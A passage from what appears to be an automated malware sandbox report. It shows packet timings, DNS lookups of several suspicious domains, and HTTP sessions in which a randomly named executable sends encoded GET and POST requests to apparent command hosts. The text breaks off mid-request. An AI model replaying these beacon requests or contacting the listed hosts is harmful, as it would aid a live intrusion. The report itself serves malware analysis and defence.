                                                                                                            Dec 6, 2024 09:34:10.859654903 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.859674931 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.859723091 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.859774113 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.859858990 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.859869003 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.859930992 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:10.859955072 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:12.241852999 CET4999980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:12.362792015 CET8049999129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:12.362884998 CET4999980192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:13.260838985 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:13.382131100 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:13.382400990 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:13.391891956 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:13.511698008 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.928694010 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.928724051 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.928736925 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.928797007 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.928853989 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.928865910 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.928880930 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.929014921 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:14.929037094 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.929049969 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.929080009 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:14.929090023 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:14.929198027 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:14.929272890 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.048871994 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.048888922 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.049062967 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.158905029 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.158953905 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.159225941 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.163140059 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.163286924 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.163389921 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.171547890 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.174149990 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.174236059 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.174266100 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.182584047 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.182674885 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.182708979 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.191030979 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.191077948 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.191118956 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.199445009 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.199532032 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.199616909 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.207812071 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.207861900 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.207905054 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.216289043 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.216392994 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.216428041 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.224698067 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.224800110 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.224817038 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.233110905 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.233189106 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.233203888 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.241842031 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.241914034 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.278959036 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.319916964 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.350925922 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.350940943 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.351078987 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.389867067 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.390050888 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.390177011 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.392885923 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.392971992 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.393032074 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.399019003 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.399075031 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.399188995 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.405234098 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.405292988 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.405399084 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.411299944 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.411406994 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.411504030 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.417480946 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.417593956 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.417692900 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.423650026 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.423697948 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:15.423794985 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.426347971 CET5000580192.168.2.4129.226.153.85
                                                                                                            Dec 6, 2024 09:34:15.546117067 CET8050005129.226.153.85192.168.2.4
                                                                                                            Dec 6, 2024 09:34:20.757261038 CET5002180192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:20.876964092 CET8050021104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:20.877167940 CET5002180192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:20.892209053 CET5002180192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:21.083864927 CET8050021104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:22.401448011 CET5002180192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:22.521584034 CET8050021104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:22.521661043 CET5002180192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:23.416731119 CET5002780192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:23.536550045 CET8050027104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:23.536916018 CET5002780192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:23.552150965 CET5002780192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:23.671864986 CET8050027104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:25.066103935 CET5002780192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:25.183080912 CET8050027104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:25.183134079 CET8050027104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:25.183154106 CET5002780192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:25.183202982 CET5002780192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:25.186537981 CET8050027104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:25.186589956 CET5002780192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:26.073621988 CET5003280192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:26.193489075 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.193661928 CET5003280192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:26.208620071 CET5003280192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:26.328527927 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328562021 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328697920 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328707933 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328798056 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328840017 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328917027 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328982115 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:26.328991890 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:27.711210012 CET5003280192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:27.831351995 CET8050032104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:27.831557989 CET5003280192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:28.762809992 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:28.882674932 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:28.882761955 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:28.928092003 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:29.047914028 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:30.508099079 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:30.508193016 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:30.508372068 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.018812895 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.018848896 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.018862009 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.019011021 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.019021988 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.019035101 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.019047022 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.019058943 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.019068956 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.019107103 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.027293921 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.027405977 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.027522087 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.035711050 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.035829067 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.035937071 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.138870955 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.138956070 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.139132023 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.210817099 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.210897923 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.211040974 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.214791059 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.214888096 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.215003014 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.222868919 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.222919941 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.223036051 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.230827093 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.230900049 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.231019020 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.238826990 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.238924026 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.239025116 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.246788979 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.246854067 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.246961117 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.254772902 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.254843950 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.254935980 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.262736082 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.262854099 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.262943029 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.270773888 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.270912886 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.271004915 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.278736115 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.278852940 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.278937101 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.286354065 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.286462069 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.286540031 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.294045925 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.294138908 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.294239998 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.301625967 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.301734924 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.301793098 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.402817965 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.402947903 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.402991056 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.405227900 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.406150103 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.406217098 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.406285048 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.411058903 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.411112070 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.411144972 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.415932894 CET8050033104.21.7.187192.168.2.4
                                                                                                            Dec 6, 2024 09:34:31.415998936 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.580789089 CET5003380192.168.2.4104.21.7.187
                                                                                                            Dec 6, 2024 09:34:31.700553894 CET8050033104.21.7.187192.168.2.4

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 6, 2024 09:32:48.816613913 CET5827953192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:32:49.283658028 CET53582791.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:05.635869026 CET5468953192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:06.104470015 CET53546891.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:20.417614937 CET5517753192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:20.947333097 CET53551771.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:35.183306932 CET6542953192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:35.579433918 CET53654291.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:33:49.955683947 CET6343053192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:33:50.461134911 CET53634301.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:34:04.699786901 CET6155253192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:34:05.269583941 CET53615521.1.1.1192.168.2.4
                                                                                                            Dec 6, 2024 09:34:20.433151960 CET5365553192.168.2.41.1.1.1
                                                                                                            Dec 6, 2024 09:34:20.754714012 CET53536551.1.1.1192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 6, 2024 09:32:48.816613913 CET192.168.2.41.1.1.10xf97bStandard query (0)www.christinascuties.netA (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:05.635869026 CET192.168.2.41.1.1.10xa9abStandard query (0)www.techmiseajour.netA (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:20.417614937 CET192.168.2.41.1.1.10xc2feStandard query (0)www.aktmarket.xyzA (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:35.183306932 CET192.168.2.41.1.1.10x206eStandard query (0)www.golivenow.liveA (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:49.955683947 CET192.168.2.41.1.1.10xa95bStandard query (0)www.iglpg.onlineA (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:04.699786901 CET192.168.2.41.1.1.10xd803Standard query (0)www.1qcczjvh2.autosA (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:20.433151960 CET192.168.2.41.1.1.10xf156Standard query (0)www.gk88top.topA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 6, 2024 09:32:49.283658028 CET1.1.1.1192.168.2.40xf97bNo error (0)www.christinascuties.net74.208.236.156A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:06.104470015 CET1.1.1.1192.168.2.40xa9abNo error (0)www.techmiseajour.nettechmiseajour.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:06.104470015 CET1.1.1.1192.168.2.40xa9abNo error (0)techmiseajour.net84.32.84.32A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:20.947333097 CET1.1.1.1192.168.2.40xc2feNo error (0)www.aktmarket.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:20.947333097 CET1.1.1.1192.168.2.40xc2feNo error (0)www.aktmarket.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:35.579433918 CET1.1.1.1192.168.2.40x206eNo error (0)www.golivenow.live66.29.149.46A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:50.461134911 CET1.1.1.1192.168.2.40xa95bNo error (0)www.iglpg.onlineiglpg.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:50.461134911 CET1.1.1.1192.168.2.40xa95bNo error (0)iglpg.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:33:50.461134911 CET1.1.1.1192.168.2.40xa95bNo error (0)iglpg.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:05.269583941 CET1.1.1.1192.168.2.40xd803No error (0)www.1qcczjvh2.autos1.1qcczjvh2.autosCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:05.269583941 CET1.1.1.1192.168.2.40xd803No error (0)1.1qcczjvh2.autos1hong-fted.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:05.269583941 CET1.1.1.1192.168.2.40xd803No error (0)1hong-fted.pels5zqo.shop1hong.pels5zqo.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:05.269583941 CET1.1.1.1192.168.2.40xd803No error (0)1hong.pels5zqo.shop129.226.153.85A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:20.754714012 CET1.1.1.1192.168.2.40xf156No error (0)www.gk88top.top104.21.7.187A (IP address)IN (0x0001)false
                                                                                                            Dec 6, 2024 09:34:20.754714012 CET1.1.1.1192.168.2.40xf156No error (0)www.gk88top.top172.67.137.47A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.christinascuties.net
                                                                                                            • www.techmiseajour.net
                                                                                                            • www.aktmarket.xyz
                                                                                                            • www.golivenow.live
                                                                                                            • www.iglpg.online
                                                                                                            • www.1qcczjvh2.autos
                                                                                                            • www.gk88top.top

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.44979374.208.236.156805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:32:49.420677900 CET417OUTGET /raea/?yhXxt4VH=PqKj/8KuIq0WSNkKBtU6xtT3L0EMxYs1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp4la8Hrjym6l49HTLUW+OY0E4RirZFYV27mA=&7j=yfeP18RhphLhR HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.christinascuties.net
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                            Dec 6, 2024 09:32:50.566658974 CET770INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 626
                                                                                                            Connection: close
                                                                                                            Date: Fri, 06 Dec 2024 08:32:50 GMT
                                                                                                            Server: Apache
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.44983284.32.84.32805216C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 6, 2024 09:33:06.242942095 CET688OUTPOST /jytl/ HTTP/1.1
                                                                                                            Accept: */*
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.techmiseajour.net
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 205
                                                                                                            Origin: http://www.techmiseajour.net
                                                                                                            Referer: http://www.techmiseajour.net/jytl/
